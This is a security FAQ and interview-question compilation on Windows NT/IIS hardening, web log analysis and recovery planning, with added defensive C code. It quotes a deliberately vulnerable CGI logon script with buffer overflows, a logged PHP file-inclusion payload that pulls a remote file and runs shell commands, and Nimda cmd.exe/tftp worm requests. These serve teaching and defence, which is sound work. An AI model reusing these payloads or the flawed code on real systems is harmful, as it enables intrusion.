1. How can I secure my client computers against my users?
One way to make it harder for the local user to do any harm to the system is to have a local PC without any hard disk or floppy disk. To boot, the system will need to talk to a boot server over the network.
2. Review the logon_validate script
You have been asked to review the source code for a compiled script that is being used to validate logon credentials for a web application. The file is called "logon_validate" and a typical logon request looks like this -
"GET /cgi-bin/logon_validate?login=test&password=test"
The source code is shown below -
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* GOOD_USER, GOOD_PASS and ****QUERY_STRING**** are placeholders from the quiz
   for the expected credentials and the CGI query string. */

void show_error(void) {
    // AUTHENTICATION ERROR
    exit(-1);
}

int main(int argc, char **argv) {
    char error_on_auth='1';
    char user[128];
    char pass[128];
    char *ch_ptr_begin;
    char *ch_ptr_end;

    /**********************************/
    /* Get Username from Query String */
    /**********************************/
    ch_ptr_begin=(char *)strstr(****QUERY_STRING****,"login=");
    if (ch_ptr_begin==NULL)
        show_error();
    ch_ptr_begin+=6;
    ch_ptr_end=(char *)strstr(ch_ptr_begin,"&");
    if (ch_ptr_end==NULL)
        show_error();
    *(ch_ptr_end++)=' ';
    strcpy(user,ch_ptr_begin);

    /**********************************/
    /* Get Password from Query String */
    /**********************************/
    ch_ptr_begin=(char *)strstr(ch_ptr_end,"password=");
    if (ch_ptr_begin==NULL)
        show_error();
    ch_ptr_begin+=9;
    ch_ptr_end=(char *)strstr(ch_ptr_begin,"&");
    if (ch_ptr_end!=NULL) *(ch_ptr_end++)=' ';
    strcpy(pass,ch_ptr_begin);

    if ((strcmp(user,GOOD_USER)==0) &&
        (strcmp(pass,GOOD_PASS)==0))
        error_on_auth='0';

    if (error_on_auth=='0') {
        // AUTHENTICATION OK!!
    } else {
        // AUTHENTICATION ERROR
        show_error();
    }
    // return(0); hehe could be evil ;PPPPP
    exit(0);
}
This pseudo-code is taken from the NGSec Web Auth Games
http://quiz.ngsec.biz:8080/game1/level6/replicant.php
Do you see any problems with this script?
How could an attacker exploit this script to bypass the authentication mechanisms in this script?
What are some mitigation options?
Note: Goal of question - This is most likely the most complex question asked during the interview, because the applicant needs to apply multiple layers of analysis, including both the attacker and defender perspectives.
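One way to mitigate the problems in the script above, as an added example that is not part of the quiz or of the original page: each parameter is extracted with an explicit length check into the same 128-byte buffers, a missing or oversized value is simply a failed logon, the query string is never modified, parameter names are only matched at a '&' boundary, and the credential comparison does not stop at the first differing byte. GOOD_USER, GOOD_PASS and the sample query strings are assumed placeholder values; a real CGI would obtain the query string from getenv("QUERY_STRING").

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical credentials standing in for the quiz's GOOD_USER / GOOD_PASS. */
#define GOOD_USER "admin"
#define GOOD_PASS "s3cret"
#define FIELD_MAX 128          /* same buffer size as the original script */

/* Copy the value of `key` from query string `qs` into `out`.
 * Returns 0 on success, -1 if the key is absent, -2 if the value would not
 * fit in `outlen` bytes including the terminator. Unlike the original, the
 * query string is never modified and no unbounded strcpy() is performed. */
int extract_param(const char *qs, const char *key, char *out, size_t outlen)
{
    size_t klen = strlen(key);
    const char *p = qs;

    /* Only accept `key=` at the start of the string or right after '&',
     * so that a parameter named "xlogin" cannot satisfy a search for "login". */
    while ((p = strstr(p, key)) != NULL) {
        int at_boundary = (p == qs) || (p[-1] == '&');
        if (at_boundary && p[klen] == '=') {
            const char *val = p + klen + 1;
            const char *end = strchr(val, '&');
            size_t vlen = end ? (size_t)(end - val) : strlen(val);
            if (vlen + 1 > outlen)
                return -2;                     /* reject rather than overflow */
            memcpy(out, val, vlen);
            out[vlen] = '\0';
            return 0;
        }
        p += klen;
    }
    return -1;
}

/* Comparison that does not stop at the first mismatching byte. */
static int const_time_eq(const char *a, const char *b)
{
    size_t la = strlen(a), lb = strlen(b);
    unsigned char diff = (la != lb);
    for (size_t i = 0; i < la && i < lb; i++)
        diff |= (unsigned char)(a[i] ^ b[i]);
    return diff == 0;
}

/* Returns 1 for valid credentials, 0 otherwise. Any parse failure is a failed
 * logon, and the decision is a return value rather than a flag that sits on
 * the stack next to the buffers. */
int validate_logon(const char *qs)
{
    char user[FIELD_MAX], pass[FIELD_MAX];

    if (extract_param(qs, "login", user, sizeof user) != 0)
        return 0;
    if (extract_param(qs, "password", pass, sizeof pass) != 0)
        return 0;
    return const_time_eq(user, GOOD_USER) && const_time_eq(pass, GOOD_PASS);
}

/* Helper: does extracting `key` from `qs` yield exactly `expected`? */
int param_matches(const char *qs, const char *key, const char *expected)
{
    char out[FIELD_MAX];
    return extract_param(qs, key, out, sizeof out) == 0 && strcmp(out, expected) == 0;
}

/* Helper: result code for a login value made of n 'A' characters (n <= 300). */
int oversized_result(size_t n)
{
    char qs[6 + 300 + 1], out[FIELD_MAX];
    if (n > 300) return -99;
    memcpy(qs, "login=", 6);
    memset(qs + 6, 'A', n);
    qs[6 + n] = '\0';
    return extract_param(qs, "login", out, sizeof out);
}

int main(void)
{
    /* Constructed requests; a real CGI would read getenv("QUERY_STRING"). */
    const char *good = "login=admin&password=s3cret";
    const char *bad  = "login=admin&password=wrong";
    printf("%s -> %d\n", good, validate_logon(good));
    printf("%s -> %d\n", bad, validate_logon(bad));
    return 0;
}
```

The length check is the part that matters for the quiz: a value of 127 characters still fits the 128-byte buffer, a value of 128 is refused before anything is copied, so the size of the buffers can no longer influence the outcome of the comparison.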
3. What application generated the log file entry below? What type of attack is this?
What application generated the log file entry below? What type of attack is this? Assuming the index.php program is vulnerable, was this attack successful?
========================================
Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /index.php HTTP/1.1
Host: www.foo.com
Connection: keep-alive
Accept: */*
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "unamex20-a" at POST_PAYLOAD
mod_security-action: 403
65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a
----------------------------------------
Note: Goal of question - to verify that the applicant can interpret various web log files, identify attacks and possible impacts. The Mod_Security Apache module generated this data in the audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script. The commands being passed are carried in the POST PAYLOAD of the request. This attack was not successful for the following two reasons:
* The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the "uname -a" data in the POST PAYLOAD.
* The attacker also made a typo in the OS commands being passed in the POST PAYLOAD. She did not include a semicolon ";" between the ls and uname commands. The target host would fail to execute the "lsuname" command.
Imagine that we are running an Apache reverse proxy server and one of the servers we are proxying for is a Windows IIS server. What does the log entry suggest has happened? What would you do in response to this entry?
68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"
68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:httpodbc.dll HTTP/1.0" 200 566 "-" "-"
Note: Goal of question - To see if the applicant is fluent at reading web server log files in the Common Log Format (CLF). In this scenario, the client system (68.48.142.117) is infected with the Nimda worm. These requests will not affect our Apache proxy server since this is a Microsoft vulnerability. While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200). The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful. Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised.
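Added example, not code from the original page: a small Common Log Format parser that replays the two proxy entries above and applies the reasoning in the note, namely that a 200 response to a cmd.exe probe followed by a tftp request from the same client is the worm's second stage and means the proxied IIS host should be inspected. The "Request:" line of the Mod_Security audit entry in the previous question has the same shape and parses the same way. The verdict levels, helper names and the 404 test line are my own; the sample array holds the page's two entries re-joined onto single lines.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define REQ_MAX 512
#define IP_MAX 64
#define MAX_CLIENTS 16

struct clf_entry {
    char ip[IP_MAX];
    char request[REQ_MAX];
    int status;
};

/* Parse one CLF line into client address, quoted request line and status code.
 * Returns 0 on success, -1 if the line is malformed. Date, byte count, referer
 * and user-agent are not needed for this triage. */
int parse_clf(const char *line, struct clf_entry *e)
{
    const char *sp = strchr(line, ' ');
    if (sp == NULL || (size_t)(sp - line) >= sizeof e->ip)
        return -1;
    memcpy(e->ip, line, (size_t)(sp - line));
    e->ip[sp - line] = '\0';

    const char *q1 = strchr(sp, '"');                 /* opening quote of the request */
    const char *q2 = q1 ? strchr(q1 + 1, '"') : NULL;
    if (q2 == NULL || (size_t)(q2 - q1 - 1) >= sizeof e->request)
        return -1;
    memcpy(e->request, q1 + 1, (size_t)(q2 - q1 - 1));
    e->request[q2 - q1 - 1] = '\0';

    const char *s = q2 + 1;
    while (*s == ' ')
        s++;
    if (!isdigit((unsigned char)*s))
        return -1;
    e->status = atoi(s);
    return 0;
}

/* Decode %XX escapes and '+' in place so "tftp%20-%20..." reads as "tftp - ...". */
void url_decode(char *s)
{
    char *w = s;
    for (; *s != '\0'; s++) {
        if (s[0] == '%' && isxdigit((unsigned char)s[1]) && isxdigit((unsigned char)s[2])) {
            char hex[3] = { s[1], s[2], '\0' };
            *w++ = (char)strtol(hex, NULL, 16);
            s += 2;
        } else {
            *w++ = (*s == '+') ? ' ' : *s;
        }
    }
    *w = '\0';
}

/* Verdicts, ordered by how urgently the backend should be checked. */
enum verdict { V_NONE = 0, V_PROBE_FAILED = 1, V_PROBE_OK = 2, V_STAGE2_AFTER_OK = 3 };

/* Replay lines in order, remembering which clients already got a 200 to a
 * cmd.exe probe; a later tftp request from such a client is the second stage.
 * Returns the worst verdict seen. */
int triage(const char *const *lines, size_t n)
{
    char probed[MAX_CLIENTS][IP_MAX];
    size_t nprobed = 0;
    int worst = V_NONE;

    for (size_t i = 0; i < n; i++) {
        struct clf_entry e;
        if (parse_clf(lines[i], &e) != 0)
            continue;                                 /* skip unparsable lines */
        url_decode(e.request);
        if (strstr(e.request, "cmd.exe") == NULL)
            continue;                                 /* not a cmd.exe request */

        int v = V_PROBE_FAILED;
        if (e.status == 200) {
            int seen = 0;
            for (size_t j = 0; j < nprobed; j++)
                if (strcmp(probed[j], e.ip) == 0)
                    seen = 1;
            if (seen && strstr(e.request, "tftp") != NULL) {
                v = V_STAGE2_AFTER_OK;
            } else {
                v = V_PROBE_OK;
                if (!seen && nprobed < MAX_CLIENTS)
                    strcpy(probed[nprobed++], e.ip);  /* both buffers are IP_MAX */
            }
        }
        if (v > worst)
            worst = v;
    }
    return worst;
}

/* Single line, no client history. */
int triage_one(const char *line) { return triage(&line, 1); }

/* The two proxy log entries quoted above, each on one line. */
static const char *const SAMPLE[] = {
    "68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] \"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 200 566 \"-\" \"-\"",
    "68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] \"GET /c/winnt/system32/cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:httpodbc.dll HTTP/1.0\" 200 566 \"-\" \"-\"",
};

int triage_sample(void) { return triage(SAMPLE, 2); }

int main(void)
{
    printf("worst verdict for the sample: %d\n", triage_sample());  /* 3 */
    return 0;
}
```

Verdict 3 for the sample is the case the note describes: the probe got a 200 and the tftp stage followed, so the proxy logs alone cannot settle whether the IIS host behind it is clean. A lone 404 to the same probe only yields verdict 1.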
If you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?
You could use either Microsoft's Internet Security and Acceleration (ISA) Server as a front-end proxy or implement URLScan on the target IIS server. The urlscan.ini file has the AllowDotInPath directive which will block directory traversal attempts.
Note: Goal of question - Determine if the applicant utilizes computer security resources such as CERT, SANS Internet Storm Center or ICAT. Email lists such as securityfocus, bugtraq, SANS @RISK, etc. are also good resources. Recent examples of threats will vary depending on current events, but issues such as new web-based worms (PHP Santy Worm) or widely used applications (awstats scripts) are acceptable.
6. What is the Microsoft Baseline Security Analyzer?
The Microsoft Baseline Security Analyzer (MBSA) is a graphical and command-line interface developed by Microsoft that can perform local or remote scans of Windows systems, assessing any missing hotfixes and vulnerabilities in certain Microsoft products. See the Microsoft Baseline Security Analyzer page on TechNet for more information.
7. What is the IIS Lockdown Tool?
This tool is part of the IIS Lockdown Wizard and works by turning off unnecessary features of the IIS server, thereby reducing the attack surface available to an attacker. It also works in conjunction with URLScan to provide multiple layers of defense and protection. The IIS Lockdown Tool page on TechNet describes its features and characteristics and provides steps for download and setup.
8. How do I secure Windows 2000 and IIS 5.0?
Security is a huge concern for anyone involved in business processes, management, and administration. A good resource of information on maintaining security in Windows 2000 and IIS is the security section of the Windows 2000 site. Also see Internet Information Services (IIS) on the Microsoft TechNet site, where you can find information on securing IIS servers in addition to resources that will help you maintain a secure system and stay current with any releases, updates, and tools.
9. Are server-side includes insecure?
Server-side includes, snippets of server directives embedded in HTML documents, are another potential hole. A subset of the directives available in server-side includes instruct the server to execute arbitrary system commands and CGI scripts. Unless the author is aware of the potential problems, it's easy to introduce unintentional side effects. Unfortunately, HTML files containing dangerous server-side includes are seductively easy to write.
Some servers, including Apache and NCSA, allow the Web master to selectively disable the types of includes that can execute arbitrary commands.
10. Are some Web server software programs more secure than others?
Again, the answer is yes, although it would be foolhardy to give specific recommendations on this point. As a rule of thumb, the more features a server offers, the more likely it is to contain security holes. Simple servers that do little more than make static files available for requests are probably safer than complex servers that offer such features as on-the-fly directory listings, CGI script execution, server-side include processing, and scripted error handling.
Version 1.3 of NCSA's Unix server contains a serious known security hole. Discovered in March of 1995, this hole allows outsiders to execute arbitrary commands on the server host. If you have a version 1.3 httpd binary whose creation date is earlier than March 1995 don't use it! Replace it with the patched 1.3 server or with version 1.4 or higher (available at the same site). The Apache plug-in replacement for NCSA is also free of this bug.
Servers also vary in their ability to restrict browser access to individual documents or portions of the document tree. Some servers provide no restriction at all, while others allow you to restrict access to directories based on the IP address of the browser or to users who can provide the correct password. A few servers, primarily commercial ones (e.g. Netsite Commerce Server, Open Market), provide data encryption as well.
The WN server, by John Franks, deserves special mention in this regard because its design is distinctively different from other Web servers. While most servers take a permissive attitude to file distribution, allowing any document in the document root to be transferred unless it is specifically forbidden, WN takes a restrictive stance. The server will not transfer a file unless it has been explicitly placed on a list of allowed documents. On-the-fly directory listings and other "promiscuous" features are also disallowed.
11. Exactly what security risks are we talking about?
There are basically three overlapping types of risk:
1. Bugs or misconfiguration problems in the Web server that allow unauthorized remote users to:
* Steal confidential documents not intended for their eyes.
* Execute commands on the server host machine, allowing them to modify the system.
* Gain information about the Web server's host machine that will allow them to break into the system.
* Launch denial-of-service attacks, rendering the machine temporarily unusable.
2. Browser-side risks, including:
* Active content that crashes the browser, damages the user's system, breaches the user's privacy, or merely creates an annoyance.
* The misuse of personal information knowingly or unknowingly provided by the end-user.
3. Interception of network data sent from browser to server or vice versa via network eavesdropping. Eavesdroppers can operate from any point on the pathway between browser and server, including:
* The network on the browser's side of the connection.
* The network on the server's side of the connection (including intranets).
* The end-user's Internet service provider (ISP).
* The server's ISP.
* Either ISPs' regional access provider.
It's important to realize that "secure" browsers and servers are only designed to protect confidential information against network eavesdropping. Without system security on both browser and server sides, confidential documents are vulnerable to interception.
Protecting against network eavesdropping and system security are the subject of sections 1 to 5 of this document. Client-side security is covered in sections 6 and 7. Section 8 deals with security alerts for specific Web servers.
12. Security interview questions for network admins
1. What is a firewall?
2. Describe, generally, how to manage a firewall
3. What is a Denial of Service attack?
4. What is a “spoofed” packet?
5. What is a SYN Flood?
6. What do you do if you are a victim of a DoS?
7. What is GPG/PGP?
8. What is SSH?
9. What is SSL? How do you create certificates?
10. What would you do if you discovered a UNIX or Network device on your network has been compromised?
11. What would you do if you discovered a Windows system on your network has been compromised?
12. What is DNS Hijacking?
13. What is a log host?
14. What is IDS or IDP, and can you give me an example of one?
15. Why are proxy servers useful?
16. What is web-caching?
13. Disaster Recovery Planning questions
* Do we have a written disaster recovery plan?
  o Are copies in possession of departmental management? At their homes?
* When was our plan last updated?
* Does our plan include:
  o A list of who in the department is empowered to declare a disaster? A list of critical personnel who will need to respond to a disaster?
    - Telephone numbers (home, cell) for all critical personnel?
  o An inventory of all our critical business functions?
  o An inventory of the computer systems that support those functions?
    - Including not only servers but critical desktop computers (e.g. departmental secretaries' computers)?
  o A rank-ordered list of which business functions we would restore first in the event of a disaster?
* Suppose we had to evacuate the building due to a major disaster (fire, flood, chemical or biological event renders the building inaccessible). Suppose all our systems are offline. How long would it take to restore basic departmental business functions and data from our offsite backup tapes?
* What confidential personal information (e.g., Social Security numbers) do we store on our servers? Do we minimize use of SSNs to the extent feasible? Could we use another identifier, such as MSU PID numbers, instead?
  o If we do need to store confidential data such as SSNs locally, how secure are the servers that house the information?
* Instead of storing personal confidential information locally, could we do business in some other way? Could we eliminate those confidential data elements from our local databases? Could we instead routinely access data as needed from University data services (thus obviating the need for the local copies)?
* Have all personnel within the unit been adequately trained in University data security requirements and applicable state or federal laws and regulations (e.g. FERPA, HIPAA, Gramm-Leach-Bliley Act)?
15. Network Security questions
* Do we use hardware firewalls to protect critical servers and desktop computers?
  o How often do we examine event logs and real-time displays to see if we are under attack?
  o Do we use software firewalls to protect end-user computers (e.g. laptops that may spend time away from the protection of the departmental hardware firewall)?
* Do we monitor the network for security exposures using auditing tools such as ISS or Nessus?
* Do we monitor the network for unusual patterns of traffic? (E.g. a server or an end-user computer suddenly begins emitting huge amounts of traffic.)
* Do we ensure that all critical business transactions take place using encrypted transmission? (E.g. SSL for Web or email transactions, SSH or VPN for remote login, encrypted file transfers.)
* How often do we back up our servers? How often do we back up the desktop computers that we use for departmental business functions?
  o A common practice is weekly backups of all data, and daily backups of files or data that have changed.
* What backup media do we use? Is hardware to read that media commonly available?
* When did we last test our backup procedures to make sure data can be restored?
* Are our backups in “image” format (requiring identical hardware or software to restore)? Could we load our backups into another system if need be?
* Do we take backup tapes offsite? Where? How often?
* How often do we back up end-user desktops? Or is this the responsibility of end users?
* Do we run anti-virus software? Which tool(s) do we use?
  o On all servers? On all critical desktops?
  o On all end-user desktops?
* Are our virus definitions current?
  o How often are the definitions updated? (At least twice weekly is advised; many experts suggest daily updates.)
* Do we run spyware detection software on our servers and on end-user computers?
* How are servers and end-user computers given new antivirus definitions? (From the vendor's Web site, from a local server, or otherwise?)
* Have we enabled automatic scanning for virus definition updates on servers and end-user computers?
* Do we scan incoming and outgoing email for viruses (as well as other modes of transmission)?
* Do we educate our users about virus avoidance (e.g. be wary of attachments in general, don't run .EXE files sent via email, etc.)?
* computers to install new software, so as to limit the capacity of viruses to install themselves?
  o E.g. using Microsoft's Group Policy Option?
18. Securing New Systems questions
* When we acquire a new server or desktop computer, do we follow a defined set of procedures to set it up?
* How do we “lock down” a new system? Do we:
  o Turn on or install software firewalls? And/or use a hardware firewall?
  o Turn off unnecessary services (e.g. FTP on a desktop computer that doesn't need to support this protocol)?
  o Rename administrator user names as appropriate? Change default passwords?
  o Follow product-specific advice or expert checklists on how to secure new servers and applications? (For instance, software vendors and outside experts offer white papers or checklists on how to secure a Windows XP workstation or a Linux server.)
* Do we test new systems for security using tools such as the Microsoft Baseline Security Analyzer, etc?
19. Where is the password that I configure a service to start with stored?
HKLM\SECURITY\Policy\Secrets\_SC_servicename\CurrVal (where servicename is the name of the service) contains the encrypted password of the service. The password is not machine or account dependent, i.e. a user foo with password bar in domain X on NT 3.51 has the same encrypted value as user baz in domain Y on NT 4.0 (with password bar).
20. Can I grant access to someone to view or change the logfiles?
Yes you can, but there is an error in the manual on how to do it. Check out Knowledge Base article Q142615 to see why the "Manage auditing and security log" privilege does not work as documented.
21. How do I get better security on remote (RAS) connections?
There are a number of things to do to get better security on remote connections:
* Put the RAS servers on one or more dedicated interfaces of the firewall
* Be sure to turn on auditing for the RAS function
* Enable authentication
* Enable session encryption
* Enable dialback
* Specify the hours during which remote users are allowed to connect
To turn on auditing for RAS, use the regedit utility to set the key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\RasMan\Parameters\Logging
to 1, then restart RAS.
22. What is AFTP, NVAlert and NVRunCmd?
When installing the complete SNA package, you will get at least three more services, AFTP, NVAlert and NVRunCmd.
* AFTP is, like its TCP/IP counterpart FTP, a tool to transfer files over the net. It might be used for anonymous logins as well.
* NVRunCmd is a service that lets someone running the NetView network monitoring tool send ordinary commands over the net that will be executed locally on the Windows NT machine.
Make sure that you have disabled these services if you want to run a more secure setup.
On the NT 4.0 CD-ROM there is a utility called rollback.exe that will corrupt your system if run. It is not intended for end users, but someone slipped and the tool is now out on many users' systems.
Without any warning, rollback.exe will remove all system registry entries, which in turn leaves the system in a state from which there is no easy way to recover. One has to grab the emergency repair disk and do a restore from the latest backup.
There are a number of problems with web servers. Bugs in the server, stupid CGI scripts, erroneous configurations, strange other services (e.g. data base connections) are just a few things that might be used to damage your security.
You might want to look at the WWW Security FAQ to get some general security information on WWW.
If you install a Windows NT machine as a web server or a firewall, you should tighten up the security on that box more than you would on ordinary machines on your internal network, since a machine accessible from the Internet is more vulnerable and more likely to be attacked. Securing the machine in this way gives you a bastion host. Some of the things you should do include:
* Remove all protocol stacks except TCP/IP, since IP is the only protocol that runs on the Internet
* Remove some network bindings
* Disable all unnecessary accounts, like guest
* Remove share permissions and default shares
* Remove network access for everyone (User Manager -> Policies -> User Rights, "Access this computer from the network")
* Disable unnecessary services (FTP, etc)
* Enable audit logging
* Track the audit information
25. What are giant packets? Or, is Windows NT susceptible to the PING attack?
There are mixed reports on whether or not NT is vulnerable to this attack. By using ping to send an oversized packet to certain systems, they can be made to hang or crash.
Windows NT 3.51 seems to be vulnerable to this attack. Knowledge Base article Q132470 describes the symptoms in Windows NT 3.51 and also includes a pointer to a patch for this problem.
26. What should I think about when using SNMP?
On other SNMP-enabled machines you can configure both a write and a read community name. On a Windows NT system you can only set one. Not having a community name does not disable the service, as one might expect. According to David LeBlanc:
27. What ports must I enable to let NBT (NetBios over TCP/IP) through my firewall?
First of all, you should really, really reconsider if this is such a good idea to let NBT traffic through your firewall. Especially if the firewall is between your internal network and Internet.
The problem with NBT is that once you open it up through the firewall, people will have potential access to all NetBIOS services, not just a selection of them, such as printing.
The following is a list of the ports used by NBT.
* netbios-ns 137/tcp NETBIOS Name Service
* netbios-ns 137/udp NETBIOS Name Service
* netbios-dgm 138/tcp NETBIOS Datagram Service
* netbios-dgm 138/udp NETBIOS Datagram Service
* netbios-ssn 139/tcp NETBIOS Session Service
* netbios-ssn 139/udp NETBIOS Session Service
28. Is NT susceptible to SYN flood attacks?
Yes. To my knowledge, all IP based systems are possible victims for the attack.
As shipped, some older versions of Windows NT had a guest account that was easily used by outsiders. Newer versions of NT ship from Microsoft with the guest account disabled. In any case, you should check your guest account and restrict it as much as possible.
Some people remove the guest account from their system, but unfortunately Microsoft ships some products that rely on the use of that account, for example Microsoft Internet Studio used in combination with Microsoft SQL or Microsoft Access running on a different computer from the one running Internet Studio.
Users are susceptible to a number of attacks, such as dictionary password guessing. In Windows NT, one way to protect against those types of attacks is to set the number of failed logins allowed before the account is disabled, either temporarily or until the system manager manually enables it again.
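As an added example (not from the original page), the failed-login threshold described above implemented as a small lockout counter: the attempt that reaches the threshold locks the account for a fixed window, a correct password is refused while the window is open, and the streak resets on success or once the window has expired. MAX_FAILURES, LOCKOUT_SECONDS and the in-memory account table are assumed values for illustration; on NT the real settings live under User Manager's Account Policy, and the manual-unlock variant would be a separate administrative path not shown here.

```c
#include <stdio.h>
#include <string.h>
#include <time.h>

/* Assumed policy values for this illustration. */
#define MAX_FAILURES     5      /* bad passwords tolerated before the account locks */
#define LOCKOUT_SECONDS  900    /* length of the temporary lockout window */
#define MAX_ACCOUNTS     16

struct account {
    char name[32];
    int failures;          /* consecutive bad passwords since the last success */
    time_t locked_until;   /* 0 when not locked */
};

static struct account accounts[MAX_ACCOUNTS];
static int naccounts;

enum login_result { LOGIN_OK = 0, LOGIN_BAD_PASSWORD = 1, LOGIN_LOCKED = 2 };

/* Forget all state; used between scenarios. */
void reset_accounts(void) { naccounts = 0; }

static struct account *find_or_add(const char *name)
{
    for (int i = 0; i < naccounts; i++)
        if (strcmp(accounts[i].name, name) == 0)
            return &accounts[i];
    if (naccounts == MAX_ACCOUNTS)
        return NULL;
    struct account *a = &accounts[naccounts++];
    snprintf(a->name, sizeof a->name, "%s", name);
    a->failures = 0;
    a->locked_until = 0;
    return a;
}

/* One logon attempt. `password_ok` is the result of the real credential check,
 * supplied by the caller; `now` is passed in so expiry can be tested without
 * waiting. A locked account rejects even a correct password until the window
 * has passed, so guessing cannot continue at full speed. */
int attempt_login(const char *user, int password_ok, time_t now)
{
    struct account *a = find_or_add(user);
    if (a == NULL)
        return LOGIN_LOCKED;                 /* fail closed if the table is full */
    if (a->locked_until != 0) {
        if (now < a->locked_until)
            return LOGIN_LOCKED;
        a->locked_until = 0;                 /* lockout expired: start fresh */
        a->failures = 0;
    }
    if (password_ok) {
        a->failures = 0;                     /* a success clears the streak */
        return LOGIN_OK;
    }
    if (++a->failures >= MAX_FAILURES) {
        a->locked_until = now + LOCKOUT_SECONDS;
        return LOGIN_LOCKED;
    }
    return LOGIN_BAD_PASSWORD;
}

int main(void)
{
    time_t t = 1000;                          /* constructed clock */
    reset_accounts();
    for (int i = 0; i < MAX_FAILURES; i++)
        printf("attempt %d -> %d\n", i + 1, attempt_login("alice", 0, t));
    printf("correct password while locked -> %d\n", attempt_login("alice", 1, t + 10));
    printf("after the window -> %d\n", attempt_login("alice", 1, t + LOCKOUT_SECONDS));
    return 0;
}
```

Passing the clock in explicitly is what makes the expiry path checkable; the two cases that usually go wrong in such counters are a correct password slipping through during the window and a stale failure count surviving past it.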
31. How do I get my computer C2-level secure, or, what is c2config?
On the CD-ROM that is included in the NT Resource Kit there is a program called c2config that can be used to tighten the security of an NT-based computer.
Be aware that c2config will not work well on systems with a localized environment, e.g. a German NT that uses ACL names in German rather than English.
In general, any computer that is not physically secured is not fully secured. If anyone is able to get access to the machine, it is possible to boot it from a diskette, CD-ROM or just steal the hard disk and use it in another computer.
There is some confusion on this point when you consult the Microsoft sources on the subject. Ever since MS discovered the Internet, a secure channel is any point-to-point network connection established between a client and a server that "provides privacy, integrity, and authentication" (see Microsoft Internet Security Framework: Answers to Frequently Asked Questions).
"Before Internet", a secure channel was (and still is) the magic connection between WNT computers in a domain. This kind of channel is used for transportation of sensitive data, such as user credentials during a domain logon and replication of the account database between DCs.
The secure channel is established as soon as the domain member machine is booted and is based on a shared secret that is used as the key for encrypting the data that travels through the channel. Each domain member has a machine account defined in the domain SAM database that is created when the machine joins the domain. The password of this account is used as the shared secret for encryption of the channel. The member machine stores it in the registry, where it can be retrieved using the lsadump program by Paul Ashton.
A problem with this is that the initial password (on a workstation account) is poorly chosen (unicode(machine-name)). This means that anybody who can listen in on the network at the time of a domain join will be able to calculate the session key used to encrypt the channel, and thereby get hold of the user credentials of anybody doing a network logon from that particular machine. The password is changed as soon as the machine is rebooted after joining the domain and then periodically every 7th day, but the new password is communicated through -- guess what -- the now not so secure channel, so as long as the listener keeps his ear on the wire, he will have the session key. No known solution, but the algorithm for encrypting the new password is not published (yet).
34. What is LSA (Local Security Authority)?
LSA stands for Local Security Authority. This is an internal subsystem (as opposed to an environmental ditto, such as Win32) within Windows NT that "generates access tokens [...], manages the local security policy, and provides interactive user authentication services" (from "Windows NT resource guide", ISBN 1-55615-653-7).
35. How well can the person do architecture from scratch?
The "here, design a secure network" question on the whiteboard. This is an open-ended question that works on how well the person can do architecture from scratch. My favorite variation on this is: given a web server, an e-mail system, a switch, a router, a firewall, a SIM or central data repository (e.g. the Kiwi syslog daemon) and an IPS system, tie them all together into a Security Information Management system, showing information paths, ports used and protocols used. Usually the original question does not go into ports and protocols and remains at the logical hierarchy, assuming that all the systems work and can talk back to a central repository; this variation really opens up the questioning to how well they understand not only architecture but dependencies, interdependencies, protocol use, and the security arrangements around protocol use. It is the same question, just more in-depth, to determine how well they understand the risks, limitations, and support for various systems in the path.
All the above questions, depending on which ones are used, can give a good indication of what the person knows how to do and how well they think about large and small issues. None of these questions trigger any HR issues, and as long as they pertain to the job, they should not get the interviewer into any trouble. The key thing is that the interviewer has to be knowledgeable about these, or if it is team interviewing, the team should be knowledgeable about the answers. Many of these are leading and can elicit some really interesting responses from interviewees. These are really just solid technical interview questions that most information security people should be able to answer given how many years they have been in the field, how much exposure they have had to various technologies, or what they like to do.